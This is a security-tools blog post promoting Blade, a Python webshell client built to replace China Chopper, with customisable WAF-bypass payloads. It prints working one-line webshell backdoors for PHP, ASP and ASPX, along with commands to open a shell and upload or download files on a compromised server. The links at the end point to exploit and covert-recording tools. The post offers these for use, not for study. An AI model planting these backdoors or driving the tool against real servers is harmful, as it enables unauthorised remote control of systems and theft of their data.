Linux

Blade – A Webshell Connection Tool With Customized WAF Bypass Payloads

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another “Chooper” supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.
Major functions
Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST[“cmd”]); ?>
PHP, ASP, ASPX & JSP supported.
Terminal Console provided.
File management & Dadabase management.


Features 
Cross-plaform supported (Python needed) 
Customizable WAF bypass payloads 
Compatible with Chooper’s server side scripts 

Server side scripts examples 
PHP: <?php @eval($_REQUEST[“cmd”]); ?> 
ASP: <%eval request(“cmd”)%> 
ASPX: <%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%> 

Usage 
Get a shell: 
python blade.py -u http://localhost/shell.php -s php -p cmd –shell 
Download a file: 
python blade.py -u http://localhost/shell.php -s php -p cmd –pull remote_path local_path 
Upload a file: 
python blade.py -u http://localhost/shell.php -s php -p cmd –push local_path remote_path 

Current issues 
Server side scripts supporting is not completed, currently only support PHP and ASP 
Database management function is not completed, so can not connect databases 


Was this article helpful?

If something here is wrong or out of date, tell us and we will check the source.

Related reading

See all
Script

Hamster Kombat: Auto Clicker and Desktop Version

Everyone is now familiar with the trending telegram-based crypto game name Hamster Kombat, a game that blends adorable critters with the world of cryptocurrency, which is taking the internet by storm. This Telegram-based game has rocketed to popularity, boasting over 200 million users in a shockingl

July 1, 2024
Exploits

Xzbot: Exploit Demo for the xz backdoor (CVE-2024-3094)

Exploration of the xz backdoor (CVE-2024-3094). Includes the following: honeypot: fake vulnerable server to detect exploit attempts ed448 patch: patch liblzma.so to use our own ED448 public key backdoor format: format of the backdoor payload backdoor demo: cli to trigger the RCE assuming knowledge o

April 1, 2024
Bluetooth

BlueSpy – Tool to Record Audio from a Bluetooth Device

BlueSpy BlueSpy was developed to record and replay audio from a Bluetooth device without the legitimate user’s awareness. The PoC was demonstrated during the talk BSAM: Seguridad en Bluetooth at RootedCON 2024 in Madrid. It’s designed to raise awareness about the insecure use of Bluetooth devices, a

March 22, 2024
Script

OpenAI Chat GPT Google Chrome Extension

Chrome Extension that Integrates ChatGPT (Unofficial) into Google Search. Prerequisites Unofficial ChatGPT API Chrome Extension Installation Clone this repository Go to chrome://extensions/ Enable Developer Mode Click on Load Unpacked Select the folder where you cloned this repository Usage Make sur

December 4, 2022